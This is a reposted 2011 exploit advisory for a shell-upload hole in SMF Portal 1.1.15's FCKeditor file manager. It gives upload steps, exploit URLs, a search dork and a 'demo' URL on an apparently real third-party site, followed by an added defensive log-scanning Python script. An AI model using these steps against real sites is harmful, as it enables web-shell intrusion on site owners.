Nytro
Posted December 6, 2011

SMF Portal 1.1.15 Shell Upload
Authored by HELLBOY

SMF Portal version 1.1.15 suffers from a shell upload vulnerability.
Posted Dec 6, 2011

In The Name Of GOD
==============================================================================
 SMF Portal 1.1.15 (fckeditor) Arbitrary File Upload Vulnerability
==============================================================================

 [»] Title    : [ SMF Portal 1.1.15 (fckeditor) Arbitrary File Upload Vulnerability ]
 [»] TestedON : [ LINUX ]
 [»] Download : [ http://www.simplemachines.org/ ]
 [»] Author   : [ HELLBOY ]
 [»] Email    : [ A68_HELLBOY@YAHOO.COM ]
 [»] Date     : [ 2011-12-2 ]
 [»] Version  : [ 1.1.15 ]
 [»] Dork     : [ "Powered by SMF 1.1.15" ]

###########################################################################

InformatioN :

1. Go to url : http://Target/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
2. Select your shell and click OK.
3. Formats can be uploaded (Php6,Jpg,gif,Xml,...)
4. Uploaded File Location : Target.com/tp-images/File/File Name

###########################################################################

===[ Exploit ]===

 [»] http://Target/[patch]/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
 [»] http://Target/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

===[ Demo ]===

 [»] http://theartglassfactory.com/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

===[ We Are : ./Iranian HackerZ ]===

 Greetz : BLACK.VIPER , SKOTE_VAHSHAT , KINGCOPE
 TBH : HELLBOY , BLACK.VIPER , SKOTE_VAHSHAT , KINGCOPE

###########################################################################

Source: http://packetstormsecurity.org/files/107543
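
For defenders, the two paths the advisory names (the FCKeditor file manager and the tp-images/File/ upload directory) are enough to check web server access logs for exposure and for script files being served from the upload directory. The Python below is an added example, not part of the original post or advisory; the combined log format, the list of script extensions and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Combined-log-format request line: client IP, method, URL, status (assumed format).
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+) [^"]*" (\d{3})')
# Paths taken from the advisory; unanchored so installs in a subdirectory also match.
CONNECTOR_RE = re.compile(r'/FCKeditor/editor/filemanager/', re.I)
UPLOAD_RE = re.compile(r'/tp-images/File/([^/]+)$', re.I)
# Assumption: extensions a PHP-enabled server may execute (the advisory lists "Php6").
SCRIPT_EXT_RE = re.compile(r'\.(php\d*|phtml|phar)(\.|$)', re.I)

def analyze(lines):
    """Return findings as (kind, client, path) tuples, in log order."""
    findings, touched = [], set()  # touched: clients that reached the file manager
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, method, url, status = m.groups()
        path = unquote(urlsplit(url).path)
        ok = status.startswith("2")
        if CONNECTOR_RE.search(path):
            if ok:  # a 2xx answer means the file manager is reachable without a block
                touched.add(client)
                kind = "connector-post" if method == "POST" else "connector-exposed"
                findings.append((kind, client, path))
            continue
        up = UPLOAD_RE.search(path)
        if up and ok and SCRIPT_EXT_RE.search(up.group(1)):
            kind = "script-after-upload" if client in touched else "script-in-upload-dir"
            findings.append((kind, client, path))
    return findings

# Constructed sample log lines (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [06/Dec/2011:10:00:00 +0000] "GET /FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [06/Dec/2011:10:00:09 +0000] "POST /FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Type=File HTTP/1.1" 200 210',
    '198.51.100.7 - - [06/Dec/2011:10:00:15 +0000] "GET /tp-images/File/upload.php6 HTTP/1.1" 200 48',
    '203.0.113.9 - - [06/Dec/2011:10:01:00 +0000] "GET /tp-images/File/photo.jpg HTTP/1.1" 200 9000',
    '203.0.113.9 - - [06/Dec/2011:10:01:05 +0000] "GET /FCKeditor/editor/filemanager/browser/default/browser.html HTTP/1.1" 404 300',
    '203.0.113.20 - - [06/Dec/2011:10:02:00 +0000] "GET /tp-images/File/x.php.jpg HTTP/1.1" 200 12',
]

if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(*finding)
```

Any `connector-exposed` hit means the file manager answers unauthenticated requests and should be removed or access-restricted; any `script-*` hit means the upload directory is serving a script-like file and script execution should be disabled there.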